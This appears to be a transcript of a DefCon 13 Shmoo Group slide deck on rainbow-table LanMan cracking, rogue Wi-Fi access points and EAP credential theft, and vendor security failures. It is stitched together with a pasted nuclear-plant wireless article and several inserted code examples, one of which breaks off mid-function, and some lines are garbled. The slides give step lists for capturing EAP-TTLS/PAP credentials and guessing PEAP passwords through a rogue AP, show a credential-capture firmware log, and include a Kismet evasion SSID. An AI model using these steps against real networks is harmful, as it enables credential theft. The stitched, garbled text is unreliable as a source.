Shmoo-Fu: Hacker Goo, Goofs, and Gear with the Shmoo

The Shmoo Group
www.shmoo.com

NOTICE TO LAW ENFORCEMENT AGENTS

The owners and users of this system are exercising First Amendment rights.

Some material on this system is in preparation for public dissemination and is "work product material" protected under The First Amendment Privacy Protection Act of 1980 (USC 42, Section 2000aa). Note that this is a civil statute. Violation of this statute by law enforcement agents is very likely to result in a civil suit as provided under Section 2000aa-6. Each and every person who has "work product material" stored on this system is entitled to recover at least minimum damages of $1000 plus all legal expenses. Agents in some states may not be protected from personal civil liability if they violate this statute.

In addition, there is email, i.e., "stored electronic communications" as defined by the Electronic Communications Privacy Act (ECPA), which has been in storage less than 180 days on this system. Such stored electronic communications are protected by the ECPA from seizure or even "preventing authorized access" without a warrant specific to each person's email. Seizing the computer where this email resides would prevent such authorized access. There are civil actions which may be taken against law enforcement agents under provision of the Act. You can find them in USC 18, 2707. On this system you can expect multiple people to have stored email. Each of them is entitled to collect $1000 plus all legal expenses for violations of Section 2700 and 2703. Please ensure you have appropriate warrants before seizing this equipment.

Stickers anyone?

What's up Shmoo?

Howdy & introductions... 

Our festivities will include: 

- Super Spy Stuff 

- IDN Fallout & Homograph Attacks 
for Personal Identities 

- Revving Up Rainbow Tables 

- Rogue Squadron & EAP Peeking 

- Shooting Your Security Wad 

- Don't Try This at Home 

- And MORE! 

Super Spy Stuff

Robots got boring, so Pablos started hanging out with models after his chic hacker photo shoot in FHM.

The result was nothing short of spectacular, as the fashionable cell-phone stowaway strifes hot women face were finally addressed.

And now... Pablos.

DefCon 13

Hmmm.

Saving the World vs. Avoiding Pound Me in the Ass Prison?

IDN Fallout

At ShmooCon 2005, Eric 
Johansen dropped the browser 
bomb regarding IDN issues. 

The press ran with it a bit. 

The folks responsible for IDN 
ranted for a bit. 

But did anything concrete occur? 
And where are we now? 

Dan Moniz goes crazy...

rainbowtables.shmoo.com

• We think rainbow tables are neat. 

• Just for fun, we started hosting 
rainbow tables that we had 
generated. 

- LanMan 

- Via Bittorrent 

- FREE 

• Some people liked that. 

• Some people didn't... 



Yay! 



Forwarded message 

From: Zhu Shuanglei <shuanglei@hotmail.com>
Date: Mar 10, 2005 12:42 AM
Subject: About your shmoo site
To: beetle@shmoo.com

Hi,

I am Zhu Shuanglei, the author of RainbowCrack software. I notice you are
offering free BitTorrent links on your website for the rainbow tables. For
those guys selling the table without permission from me, they are not welcome.
But you are worse.

As you may know, I develop the rainbowcrack tool and release it to the public
for free. I just want to introduce the technique to the world and those need it
can benefit from this software. If I sell the tables, I am only making some
money for my work and for the fee of hosting my website and for my computing
resource. This should be quite reasonable. I am not a business man, if I am
there will not be the source code or table generation tool free on the net and I
can make a lot of money.

Are you feeling you are cool "Because knowing all passwords is cooler than
trying to crack one. ;)". All over the world there will be a lot of guys can do
what you do, they aren't. Do you know why? To show off prove neither your
ability nor your knowledge.

If possible, please keep honour of my intellectual property of this software,
and let those need the tables to generate by themself. If everyone act like you
there will be no reason for me to develop this software further or develop
other useful software. Or I will never release anything useful to the public.

Don't be crazy any more!

Best Regards,

Zhu Shuanglei

Revving Up Rainbow Tables 

• So, badass LanMan tables are online now via Bittorrent, and still for FREE.

lm_alpha-numeric-symbol32-space.torrent
- Join the 43.9 GB torrent!!!

• Meanwhile, Dan decided to "be crazy" a bit more.

• We don't need your stinkin' code, Zhu!

• And Snax says, "FUCK OFF!"

Unnamed Project 

Dan Moniz 

Rev. Dr. Patrick Stach 

Improving on RainbowCrack

We started out trying to optimize RainbowCrack...

But then we found out that it is teh suck.

So we changed our approach and made a new tool.

Doesn't have a name... yet.

Problems with RainbowCrack

Reduction function bias

If your keyspace is 6 valid inputs, and you have 2^4 outputs, the reduction that RainbowCrack (slightly simplified) does is:

(total num of outputs) mod (total num of inputs) = bias marker

Example of Reduction Function Bias

Say that LM had only 6 possible inputs. Say that the algorithm (which in LM is DES) has up to 2^4 outputs (16).

0 mod 6 = 0     8 mod 6 = 2
1 mod 6 = 1     9 mod 6 = 3
2 mod 6 = 2    10 mod 6 = 4
3 mod 6 = 3    11 mod 6 = 5
4 mod 6 = 4    12 mod 6 = 0
5 mod 6 = 5    13 mod 6 = 1
6 mod 6 = 0    14 mod 6 = 2
7 mod 6 = 1    15 mod 6 = 3

That's a lot of modulo arithmetic. You'll notice that there are 3 of every value except 4 and 5.

We only have two of those.

Reduction Function Bias Continued

By taking an arbitrary random output from the algorithm (we can assume that the algorithm output is random) and taking it modulo 6, there's a better chance of the input values being below the bias marker than above.

Values 0 to 3 have a better chance of being picked at random as the next input due to this than the values 4-5.

The Real Bias Problem

$\sum_{i=0} 69^{i}$




This Riemann sum is not an integral factor of 2^64 just as 6 is not an integral factor of 16.

This modulo arithmetic has a bias.

You can assume the output of DES is statistically random, or at least random enough that the bias would still be present.

Why this matters 

• n = the floored result of (total num of outputs)/(total num of inputs)

• We'll add 1 for a key below the bias marker to represent the extra chance it has due to the bias

• (1+n)/(total num of outputs) = chance of hitting any one given key below the bias marker

• n/(total num of outputs) = chance of hitting any one given key at or above the bias marker

• Values below the bias marker are unfairly weighted and are more likely to be inputs to the rainbow chain generation!
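
The bias arithmetic from these slides, worked exactly, as an added example (not code from the talk or from RainbowCrack). It goes beyond the 6-input, 16-output case to a 2^64 output space; the 69-character, length 0 to 7 keyspace used for that case is an assumption, as are all function names.

```python
"""Exact modulo-reduction bias, and what discarding the ragged tail does to it."""
from fractions import Fraction


def bias_profile(num_outputs, num_inputs):
    """Return (n, bias_marker, p_below, p_at_or_above) for `h mod num_inputs`.

    n             = floor(outputs / inputs)
    bias_marker   = outputs mod inputs
    p_below       = chance of one given key below the marker    = (1 + n) / outputs
    p_at_or_above = chance of one given key at/above the marker = n / outputs
    """
    if not 0 < num_inputs <= num_outputs:
        raise ValueError("need 0 < num_inputs <= num_outputs")
    n, marker = divmod(num_outputs, num_inputs)
    p_at_or_above = Fraction(n, num_outputs)
    # With marker == 0 the keyspace divides the output space evenly: no bias.
    p_below = Fraction(n + 1, num_outputs) if marker else p_at_or_above
    return n, marker, p_below, p_at_or_above


def relative_excess(num_outputs, num_inputs):
    """How much more likely a key below the marker is than one above it."""
    _, _, p_below, p_at_or_above = bias_profile(num_outputs, num_inputs)
    return p_below / p_at_or_above - 1


def histogram(num_outputs, num_inputs, reject_tail=False):
    """Enumerate every possible output and count which key it reduces to.

    With reject_tail=True, outputs at or above the largest multiple of
    num_inputs are discarded instead of reduced. A chain generator that
    does this must derive a replacement value deterministically (for
    example by re-hashing) so that chains stay reproducible.
    """
    limit = num_outputs
    if reject_tail:
        limit -= num_outputs % num_inputs
    counts = dict.fromkeys(range(num_inputs), 0)
    for h in range(limit):
        counts[h % num_inputs] += 1
    return counts


def lm_keyspace(charset_size=69, max_len=7):
    """Sum of charset_size**i for i = 0..max_len (assumed upper limit: 7)."""
    return sum(charset_size ** i for i in range(max_len + 1))


if __name__ == "__main__":
    print("toy case    :", bias_profile(16, 6))
    print("plain modulo:", histogram(16, 6))
    print("tail dropped:", histogram(16, 6, reject_tail=True))
    n, marker, _, _ = bias_profile(2 ** 64, lm_keyspace())
    print("2^64 case   : n =", n, "bias marker =", marker)
    print("excess chance below marker:", float(relative_excess(2 ** 64, lm_keyspace())))
```

The relative excess is 1/n, so it shrinks as the output space grows relative to the keyspace: 50% in the 16-over-6 case, well under one part in a million for a 64-bit output over the assumed keyspace.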

Our Generation Technique (how we avoid bias)

• We start generating at the last possible input and walk towards the first input.

• As we generate we use a bitmask, so we can determine if we have computed the key or not. We have 100% verified keyspace because everything is accounted for.

• At 1 bit per input it requires 768 GB of disk space if we were to do it on one machine.

Our Badass Sorting-Fu

We separate out anything less than or equal to 6 characters. 7 character keyspace is one table, 5-6 keyspace is another.

We do this so that you can detect the length of the password.

LanMan primer: take 14 bytes of input and split it into two 7 byte parts, hash them independently.


LanMan Hashing Examples

• Say you have a password "dog"

dog = DOG\0\0\0\0\0\0\0\0\0\0\0

• Which goes to...

DOG\0\0\0\0 \0\0\0\0\0\0\0

• You can detect that the first half is 7 characters or less because the second half is the null password hash.

LanMan Hashing Examples

• Now with a password of "spamdadrulz"...

spamdadrulz = SPAMDADRULZ\0\0\0

• Which goes to...

SPAMDAD RULZ\0\0\0

• You know that the first half is 7 characters because the second half of the hash is not the null password hash.

• This decreases the time spent looking through worthless hash values!
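
The LanMan split and the null-half length tell from the Sorting-Fu and LanMan example slides, written as an audit check over stored hashes. This is an added example, not code from the talk: the function names, the finding labels and the pwdump-style sample lines are assumptions, and every hash half in the sample other than the well-known null-half constant is a constructed placeholder.

```python
"""LanMan input preparation and what a stored LM hash reveals about length."""

# LM hash of an all-NUL 7-byte half; an empty password is this value twice.
NULL_HALF = "AAD3B435B51404EE"
HEX_DIGITS = set("0123456789ABCDEF")


def lm_halves(password):
    """Upper-case, NUL-pad (or truncate) to 14 bytes, split into two 7-byte parts.

    Simplification: plain ASCII only; real LanMan uses the OEM code page.
    Each part is then hashed independently, which is why the halves of the
    resulting hash can be examined separately.
    """
    raw = password.upper().encode("ascii")[:14].ljust(14, b"\0")
    return raw[:7], raw[7:]


def classify_lm_hash(lm_hex):
    """Say what the two 16-hex-digit halves give away, without any cracking."""
    h = lm_hex.strip().upper()
    if len(h) != 32 or not set(h) <= HEX_DIGITS:
        raise ValueError("LM hash must be 32 hex characters")
    first, second = h[:16], h[16:]
    if first == NULL_HALF and second == NULL_HALF:
        return "empty password or LM storage disabled"
    if second == NULL_HALF:
        return "password is 7 characters or less"
    return "password is 8 to 14 characters; first half is exactly 7"


def audit(pwdump_text):
    """Map account name to finding for lines shaped user:rid:LM:NT:::"""
    findings = {}
    for line in pwdump_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue  # not a pwdump-style record
        findings[fields[0]] = classify_lm_hash(fields[2])
    return findings


# Constructed sample. Only AAD3B435B51404EE is a real LM value; the other
# halves and the NT column are placeholders, not hashes of any password.
SAMPLE = """\
# user:rid:LM:NT:::
alice:1001:0123456789ABCDEFAAD3B435B51404EE:00000000000000000000000000000000:::
bob:1002:0123456789ABCDEFFEDCBA9876543210:00000000000000000000000000000000:::
svc:1003:AAD3B435B51404EEAAD3B435B51404EE:00000000000000000000000000000000:::
"""

if __name__ == "__main__":
    print(lm_halves("dog"))
    print(lm_halves("spamdadrulz"))
    for account, finding in audit(SAMPLE).items():
        print(f"{account:6} {finding}")
```

Any account that gets one of the first-half findings is storing an LM hash at all, which is the condition to remove.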

RainbowCrack Loses 

RainbowCrack just generates random hashes.

And has that reduction function bias problem...

Bad + Suck = l4m3x0r!!!

We Get Our Crack On 

rtcrack reads in as much of the
hash table file that rtgen
generates using the read()
syscall.

It walks linearly checking to see 
if the endpoints match on the 
rainbow chains. 

This has O(n) complexity. 

We Get Our Crack On 

• We store the start point and the endpoints in
separate files at corresponding offsets

• Next we take the page size on x86 (4096 bytes)
divided by the entry size (8) plus 1 (for the index)
which equals 513

• So every 513th entry, after we've sorted them
lowest to highest, is stored in a special index file

• At crack time, we mmap() the endpoint index file,
and use divide and conquer (Fibonacci find) to
find out if the endpoint is in this index file, or, if
it's not, to which offset the endpoint is referenced
in the master index file

We Get Our Search On 

Thus, for each offset it has to 
read a max of one page of 
memory off of disk 

4096 bytes read to check 512 
entries 

This is Bayes trees, modified 

Patrick has a Doctorate of 
Divinity in Searching and Sorting 
from the Church of Knuth 
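
The two-level lookup from the "We Get Our Crack On" and "We Get Our Search On" slides, as an added example that is not The Shmoo Group's code. Assumptions: in-memory arrays stand in for the endpoint, start-point and index files that the slides mmap(), a plain binary search replaces the Fibonacci search the slides name, and the `rt_*` names and the table contents are constructed for illustration.

```c
/* Added illustration: sparse page index over sorted rainbow-chain endpoints. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define PAGE_SIZE  4096u
#define ENTRY_SIZE 8u                             /* one 64-bit endpoint */
#define STRIDE     (PAGE_SIZE / ENTRY_SIZE + 1u)  /* 512 + 1 = 513 */

typedef struct {
    const uint64_t *endpoints; /* sorted ascending; stands in for the endpoint file */
    const uint64_t *starts;    /* chain start points at the corresponding offsets */
    size_t          n;
    uint64_t       *index;     /* every 513th endpoint; stands in for the index file */
    size_t          n_index;
} rt_table;

/* Copy every STRIDE-th endpoint into the index. Returns 0 on success. */
static int rt_build_index(rt_table *t)
{
    t->n_index = (t->n + STRIDE - 1) / STRIDE;
    t->index = NULL;
    if (t->n_index == 0)
        return 0;
    t->index = malloc(t->n_index * sizeof *t->index);
    if (t->index == NULL)
        return -1;
    for (size_t k = 0; k < t->n_index; k++)
        t->index[k] = t->endpoints[k * STRIDE];
    return 0;
}

/* Return the offset of target in the endpoint array, or -1 if absent.
 * *blocks_read is set to the number of 4096-byte blocks touched (0 or 1). */
static long rt_lookup(const rt_table *t, uint64_t target, unsigned *blocks_read)
{
    *blocks_read = 0;
    if (t->n_index == 0 || target < t->index[0])
        return -1;

    /* Step 1: find the largest k with index[k] <= target. */
    size_t lo = 0, hi = t->n_index;
    while (hi - lo > 1) {
        size_t mid = lo + (hi - lo) / 2;
        if (t->index[mid] <= target)
            lo = mid;
        else
            hi = mid;
    }
    if (t->index[lo] == target)
        return (long)(lo * STRIDE);   /* hit in the index itself, no block read */

    /* Step 2: search the 512 entries (one page) that follow that index entry. */
    size_t first = lo * STRIDE + 1;
    size_t last  = first + (STRIDE - 1);   /* exclusive bound */
    if (last > t->n)
        last = t->n;                       /* final block may be short */
    if (first >= last)
        return -1;
    *blocks_read = 1;
    while (first < last) {
        size_t mid = first + (last - first) / 2;
        if (t->endpoints[mid] == target)
            return (long)mid;
        if (t->endpoints[mid] < target)
            first = mid + 1;
        else
            last = mid;
    }
    return -1;
}

/* Constructed sample table: 2000 sorted endpoints with matching start points. */
#define DEMO_N 2000u
static uint64_t demo_end[DEMO_N], demo_start[DEMO_N];

static int rt_demo_table(rt_table *t)
{
    for (size_t i = 0; i < DEMO_N; i++) {
        demo_end[i]   = 3 * (uint64_t)i + 7;  /* strictly increasing */
        demo_start[i] = 1000000u + i;
    }
    t->endpoints = demo_end;
    t->starts    = demo_start;
    t->n         = DEMO_N;
    return rt_build_index(t);
}

int main(void)
{
    rt_table t;
    unsigned blocks;
    if (rt_demo_table(&t) != 0)
        return 1;
    const uint64_t probes[] = { 1546, 3007, 3008, 5 };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        long off = rt_lookup(&t, probes[i], &blocks);
        printf("endpoint %llu -> offset %ld, blocks read %u\n",
               (unsigned long long)probes[i], off, blocks);
    }
    free(t.index);
    return 0;
}
```

A hit at offset `off` gives the chain's start point as `starts[off]`, which is why the two files are kept at corresponding offsets.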

RainbowCrack Gets An L 

For Lame 

• Disk I/O costs as much CPU time 
as encryption in RainbowCrack, if 
not more. 

• RainbowCrack fails to account for 
this in their statistics. 

The Seekret Sauce 

Our code is implemented in C and 
assembly for the IA64 (Itanium2) 
and running on a classified 
number of processors. 

Thanks to SGI! 

We also have the generator 
implemented in VHDL to run as 
custom specialized hardware to 
run on Spartan-3 FPGAs. 

New Wi-Fi kung-fu from Beetle...

Why oh why do we Wi-Fi? 

• Who here has an open wireless 
network at home? At work? 



• Crap! My Tivo can't do WPA. 
Neither can my PSP. Ummm... 
does it matter? 



When and where should we Wi-Fi?

- Coffee Shops? Airports? Hospitals?
Banks? Ummm... Nuclear Power plants?

DefCon 13




IT IN THE PLANT



standards. The same infrastructure also will 
provide wired LAN connectivity throughout 
the plant for both voice and data applications 
as well as for remote video monitoring and 
control. 

According to Carter, TXU plans to use the wireless solution — provided by Azima — to help Comanche Peak integrate its work order management and scheduling processes, electronic procedures, clearance and safety tagging, operator logs, equipment monitoring, electronic messaging, plant drawings, phone books, equipment references and locations, and selected Internet/intranet access. Video applications will include radiation protection monitoring, remote equipment monitoring, and video conferencing.

So far, Azima has installed monitoring devices on more than 50 pieces of critical equipment within Unit 2 of Comanche Peak. Besides vibration, the devices also monitor current, partial discharge, motor speed, and other key variables. Other wireless applications already installed throughout the plant include mobile computing, video monitoring, and VoIP telephones (Figure 4).

4. Collecting the data. A typical wireless access point at Comanche Peak. So far, Azima has installed monitoring devices on more than 50 pieces of critical equipment within Unit 2. Courtesy: TXU

More wireless implementation stories

Two other projects underscore the growing popularity of wireless machinery monitoring. One is at Exelon Nuclear’s Limerick Generating Station (Figure 5) in Montgomery County, Pa. The Limerick plant has had maintenance problems with the fans used to exhaust turbine enclosures. Nicknamed “fans-in-a-can” because they are typically mounted inside cylindrical ducts, these fans are inaccessible to technicians while the plant is on-line. But since the installation of transmitter-equipped vibration and temperature sensors on the fans’ motors, Limerick has seen reductions in the time and costs of document control and tracking, data conversion/transcription, and error checking/reduction.

5. Watching those "fans in a can." At Exelon Nuclear's Limerick Generating Station, wireless technology is being used to monitor inaccessible fans and motors. Courtesy: Exelon Nuclear

The other wireless monitoring project worth mentioning was at the San Onofre Nuclear Generating Station in California. Engineers at the plant had long wanted to remotely monitor the temperature of several 2,500-hp secondary plant motors as an indicator of their health. According to Lloyd Pentecost, a maintenance engineer at the plant, “If a motor were to fail unexpectedly, the plant would have to operate at only 80% capacity for a number of days, and the losses could exceed $400,000.” Pentecost is pleased with the network of wireless temperature sensor/transmitters that has been installed at San Onofre because “Collecting and analyzing motor temperature data in real time allows action to be taken before a catastrophic failure occurs.”

EPRI promotes wireless 

The Comanche Peak de-wiring project was executed in partnership with EPRI, which set up the performance benchmarks and monitored the project. EPRI plans to issue a comprehensive report on it this summer.

Ramesh Shankar, who is spearheading an EPRI program to evaluate the feasibility of installing more remote monitoring systems at U.S. utility generating stations, believes that wireless is a technology whose time has come. He says a major focus of the effort is to determine the extent to which wholesale deployment of wireless devices might improve plant safety and reliability.

Shankar adds that his program already has two “products.” One lays out the business case for applying wireless technologies; the other offers advice to plant managers on implementation and regulatory issues. To support the effort, EPRI has formed a Wireless Technology Working Group to develop guidelines and to help member companies achieve reliable, economical, and safe use of wireless devices. EPRI also has helped the DOE’s Oak Ridge National Laboratory form the Wireless Industrial Networking Alliance (WINA). The mission of WINA is to promote a dialogue among suppliers, end users, and government about wireless technologies in the nation’s power plants.

To accelerate the adoption of wireless technologies for machinery monitoring and data/voice/video communications, WINA is focusing on four different activities:

■ Explaining wireless technologies to end users.

■ Promoting effective standards, regulations, and practices.

■ Quantifying and communicating the benefits of going wireless.

■ Benchmarking against customer requirements.

Each year, WINA sponsors two wireless workshops that are focused solely on the power generation industry. The next one is scheduled for October 3-5 in Jersey City, N.J.

Where did we go wrong? 
Where are we going? 

• Technology of convenience versus 
the inconvenience of securing it. 

• The poor, poor users were left out 
in the authentication cold. 

• Half-ass security standards pass
the buck and/or provide de facto
insecure options.

• Security acronyms have taken
precedence over proper
implementation.







"Choose a Mobile Network with Care."

For a low-priced mobile network, choose FI2G/FINNET.

"CHOOSE A MOBILE NETWORK AT RANDOM!"

‘Hello Switch to Ra&ohnp to the Vodatone network in Fuiand


How the FUCK does the user know?!

[Diagram labels: SSID: “goodguy”; Stronger or Closer Access Point; Wi-Fi Card; SSID: “badguy”]










Rogue AP Attacks

Choose your Wi-Fi weapon...

Cisco Gear @ 100mW (20dBm)

Normal Gear @ 25mW (14dBm)

Senao Gear @ 200mW (23dBm)

Use a 15dBd antenna with a Senao for 38dBd total...

6 WATTS!

VS 25mW?

BAD GUY WINS! NO CONTEST!

Rogue APs won't go away... 

• Users will be users, and they WILL 
fall for access point 
"impersonators". 

• If you didn't notice, phishing and 
identity theft are on the rise... and 
so is hotspot usage. 

• "Extra" wireless client profiles 
provide extra avenues of attack. 

• EAP is an acronym, not a catch-all. 










Gartner can blow us. 



Rogue RADIUS 

Who says rogue APs can't be used 
against corporate wireless 
networks? 

There are plenty of ways to screw 
up EAP. 

FreeRADIUS provides a simple & 
easy way to accept EAP 
credentials 










- Integrates nicely with hostapd. 

Can allow for "EAP Peeking"... 




[Diagram: EAP authentication exchange. Message labels: EAP-Response / Identity, EAP-Request, EAP-Response, EAP-Success, EAP-Key, EAP-Success & Key]
Secure Tunnel Established w/o Remote Certificate Check? 






EAP-TTLS w/ PAP Attack? 

[Diagram labels: Wireless / Wired; Windows XP w/SP2; EAP-TTLS w/ PAP over TLS; RADIUS Server; Rogue AP w/ Rogue RADIUS Server]

1. Disassociate users. 

2. Learn username & password. 

3. Disassociate, copy creds to local EAP config. 

4. Impersonate victim with legit username & password whenever. 







All Your PAP... Google for 
targets, if you like. ;) 

All Your CAs... The "All or 
None" Vulnerability 

[Screenshot: Windows "Protected EAP Properties" dialog. Under "When connecting:" it shows the "Validate server certificate" checkbox, a "Connect to these servers:" field, the "Trusted Root Certification Authorities:" checklist, and the option "Do not prompt user to authorize new servers or trusted certification authorities". "Select Authentication Method:" is set to "Secured password (EAP-MSCHAP v2)", with "Enable Fast Reconnect" below.]






PEAP Attack? 

[Diagram labels: Wireless / Wired; Windows XP SP2; PEAP w/ MSCHAPv2 over TLS; Rogue AP w/ Rogue RADIUS Server; RADIUS Server]

1. Disassociate users. 

2. Learn DOMAIN and username w/ rogue AP. 

3. Disassociate, seed local password file. 

4. User continuously attempts to re-authenticate. 

5. Repeat #3. Authentication success = correct password guessed! 
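
The client-side conditions these slides rely on (a tunnel set up without checking the server certificate, "all or none" CA trust with no server name restriction, PAP inside the tunnel, and leftover extra profiles) can be checked for in supplicant configuration. The following is an added example, not part of the original slides: it assumes wpa_supplicant.conf-style network blocks rather than the Windows XP dialog shown above, and the sample configuration and finding names are constructed for illustration.

```python
import re

# Constructed sample in wpa_supplicant.conf syntax (not taken from the slides).
SAMPLE_CONF = """
network={
    ssid="corp-ttls"
    key_mgmt=WPA-EAP
    eap=TTLS
    identity="alice"
    phase2="auth=PAP"
}
network={
    ssid="corp-peap"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="bob"
    ca_cert="/etc/ssl/certs/ca-certificates.crt"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="corp-pinned"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="carol"
    ca_cert="/etc/wifi/corp-radius-ca.pem"
    domain_suffix_match="radius.example.test"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="hotel-guest"
    key_mgmt=NONE
}
"""

# Simplification: assumes no "}" appears inside a quoted value.
BLOCK_RE = re.compile(r"network\s*=\s*\{(.*?)\}", re.S)
TUNNELED = {"TTLS", "PEAP"}
# wpa_supplicant options that bind the server certificate to an expected name.
NAME_CHECKS = ("domain_suffix_match", "domain_match",
               "subject_match", "altsubject_match")


def parse_networks(text):
    """Return one {option: value} dict per network={...} block."""
    networks = []
    for body in BLOCK_RE.findall(text):
        net = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)  # phase2="auth=PAP" splits once
            net[key.strip()] = value.strip().strip('"')
        networks.append(net)
    return networks


def audit_network(net):
    """Return finding names (hypothetical labels) for one network block."""
    findings = []
    # key_mgmt=NONE means no WPA authentication (open or static WEP):
    # the kind of extra profile a client will join without any server check.
    if net.get("key_mgmt", "").upper() == "NONE":
        findings.append("unauthenticated-profile")
    methods = set(net.get("eap", "").upper().split())
    if methods & TUNNELED:
        if "ca_cert" not in net and "ca_path" not in net:
            # TLS tunnel is built to whoever answers: no certificate check.
            findings.append("no-server-cert-validation")
        elif not any(opt in net for opt in NAME_CHECKS):
            # A CA is trusted but any certificate it issued is accepted.
            findings.append("any-cert-from-trusted-ca-accepted")
        if "AUTH=PAP" in net.get("phase2", "").upper():
            # Inner PAP hands the password itself to the tunnel endpoint.
            findings.append("cleartext-inner-password")
    return findings


def audit_config(text):
    """Map each SSID in the configuration to its list of findings."""
    return {net.get("ssid", "<no ssid>"): audit_network(net)
            for net in parse_networks(text)}


if __name__ == "__main__":
    for ssid, findings in audit_config(SAMPLE_CONF).items():
        print(f"{ssid}: {', '.join(findings) if findings else 'ok'}")
```

Only the profile that sets both a CA and a server name match comes back clean; a shared system CA bundle without a name match still accepts any server certificate issued under it.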







Wireless Weaponry for 

Windows 

But rogue AP attacks require a 
"sophisticated hacker", right? 
Wrong. 

SoftAP + TreeWalk + Apache + 
ActivePerl = Airsnarf for 
Windows 

- http://airsnarf.shmoo.com/airsnarf4win. 

- "Evil Twin Access Points for Dummies" 










But why only run one rogue AP, 
when you can run two... pJdttee? 










Rogue Squadron 

Because it's SO hard to run 
Airsnarf (the SHELL script)... 

Rogue AP setup for the masses 

Modified WRT54G firmware 

- Based off of Ewrt 

- Adds username & password portal 
capture and logging 

Looks like this... 

[Screenshot: Linksys WRT54G (Wireless-G Broadband Router) web interface, Setup > Basic Setup page, branded "Airsnarf" with "Firmware Version: Rogue Squadron 0.1". It shows the stock Internet Setup and Network Setup fields (Internet connection type, router name, local IP address, subnet mask, DHCP server settings) and the accompanying help text.]






[Screenshot: browser at http://192.168.1.1/Nocat.asp showing the NoCatSplash settings page of the "Airsnarf"-branded WRT54G interface (Firmware Version: Rogue Squadron). Fields shown: NoCatSplash Enable/Disable; Gateway Name "The Shmoo Group"; Home Page http://airsnarf.shmoo.com/; Allowed Web Hosts shmoo.com; Document Root /usr/share/nocat/htdocs/; Exclude Ports 25; Login Timeout; Verbosity 0; Route Only Enable/Disable.]



[Screenshot: browser window titled "Airsnarf - A Rogue AP Login Page" at http://192.168.1.1:5280/?redirect=http%3A//www.google.com/, showing the prompt "Please enter your username and password." with Username and Password fields and Login and Cancel buttons.]









ssh 

[Screenshot: ssh session to the router]

    root@192.168.1.1's password: 

    Airsnarf 

    Rogue Squadron v0.1 Firmware for the WRT54G 
    by The Shmoo Group 
    http://airsnarf.shmoo.com 

    Proof-of-concept rogue AP firmware for the 
    Linksys WRT54G, based on the Ewrt firmware 
    v0.3 beta 1 by Portless Networks, which is 
    based on the Linksys 3.81.3 codebase. 

    THIS FIRMWARE IS INTENDED FOR DEMONSTRATION 
    PURPOSES ONLY! USE OR ABUSE AT YOUR OWN RISK! 

    BusyBox v1.00 (2005.07.19-00:42+0800) Built-in shell (ash) 
    Enter 'help' for a list of built-in commands. 

    airsnarf ~# cat /opt/airsnarfs.txt 
    redirect=http://www.google.com/ 

    username=shmoouser password=shmoopassword accept_terms=yes redirect=http://www.google.com/ mode_login=Login 
    airsnarf ~# 

http://airsnarf.shmoo.com/rogue_squadron/ 



Heeeeeeere's Rodney! 



Shooting Your Security Wad 



(Never let Beetle title your slides) 



Why is Rodney ranting now?

Been doing product reviews 
(public and private) 

Keep seeing some incredibly lame 
product "features" 

There's a risk of FPGS (Ford 
Pinto Gastank Syndrome) 



Four Hard Questions? 

Does your product produce an 
external log? 

Do you have a security incident report 
mechanism? 

Does your product store its key
material securely?

Do you provide a secure management 
interface? 










Why are these hard questions in 2005? 



Don't make things worse 

• Security products should NOT 
increase the attack surface. 

• Central servers are single points 
of failure 

• Communicate securely among 
your components 

• Don't run sloppy distros



Stupid Vendor Tricks 

No logging when there are errors 
No logging upon start-up 
Self-signed certificates ONLY 
No capability for change control 
Incoherent documentation/UI 
Follow the damn protocol specs 



Attacks you should try 

• Run NMAP and NESSUS (or your fav 
commercial equivalent) 

• telnet 10.0.0.1 22 

• openssl s_client -connect 10.0.0.1:443 -ssl2

• Go after the web interface 

• Ettercap 

• Google for a random relevant exploit and try 
it (or one off a security mailing list) 



How you can make things better

• (We're not the bad guys. We're 
trying to be educated consumers. 
Here's some things you can do to 
help make things better.) 

• If you show how one of these
possible flaws can be broken,
submit to present it at ShmooCon
2006







How you can make things better

• Report flaws to the vendor 

• Document risks caused by 
security gear 

• Disrupt future purchases of 
clueless security gear 

• Encourage future purchases of
clueful security gear

• Show how easy it is to break 
things 



Did you want more gear? 

Okey dokey. 

CowboyM, show 'em what you got.



802.11 bloodhound







Kicks Ass 



Announcing PotKettle Industries

• Exploit the exploiters 

• ??? 

• • • 

• Profit 










DefCon 13 







Multihtml.c exploit remote vulnerability

Category: Remote for Remote 
Vendor: bansh33 






<rishi@siegesoft.com> 

Affects: All Platforms 

URL: http://potkettle.net/advisories/!



Kismet Evasion 

• So, wanna evade kismet?

scanned = sscanf(in_data+hdrlen+18, "%d \001%255[^\001]\001 "
                 "\001%255[^\001]\001 "
                 "%d %d %d %d %d %d %d %d %d %hd.%hd.%hd.%hd "
                 "%d %f %f %f %f %f %f %f %f %d %d %d %f %d %d %d %d %d %d "
                 "%f %f %f %lf %lf %lf %ld %ld"
                 "%d %d %d %d %d %d %d %d",
                 (int *) &type, ssid, beaconstr,
                 &llc_packets, &data_packets, &crypt_packets,

Set your SSID to "shmoo\x01"
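Why an SSID carrying the 0x01 byte defeats a parser of this shape, and what closes the hole: the example below is added here and is not Kismet's code. The six-field record layout, the function names and the "?" and "(empty)" replacements are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 256
#define EXPECTED_FIELDS 6

/* Reduced record (assumed layout): type, SSID, beacon info, three counters. */
struct net_record {
    int type;
    char ssid[FIELD_MAX];
    char beacon[FIELD_MAX];
    int llc, data, crypt;
};

/* Sender without any check: strings are wrapped in \001 delimiters even
 * when the string itself contains \001. */
static int serialize_naive(char *out, size_t outlen, int type,
                           const char *ssid, const char *beacon,
                           int llc, int data, int crypt)
{
    return snprintf(out, outlen, "%d \001%s\001 \001%s\001 %d %d %d",
                    type, ssid, beacon, llc, data, crypt);
}

/* Receiver: the same sscanf idiom as on the slide, cut down to six
 * conversions. Returns how many fields were converted. */
static int parse_record(const char *line, struct net_record *r)
{
    memset(r, 0, sizeof *r);
    return sscanf(line, "%d \001%255[^\001]\001 \001%255[^\001]\001 %d %d %d",
                  &r->type, r->ssid, r->beacon, &r->llc, &r->data, &r->crypt);
}

/* Sender-side fix: attacker-controlled strings never reach the wire with
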